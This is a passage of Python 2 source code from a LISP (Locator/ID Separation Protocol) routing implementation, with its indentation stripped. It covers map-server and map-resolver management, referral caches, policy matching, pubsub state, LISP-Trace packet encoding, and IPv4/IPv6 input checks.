"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#entry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Check IGMP packet first. And don't do IP checksum and don't test TTL.
#
if (ord(packet[9]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
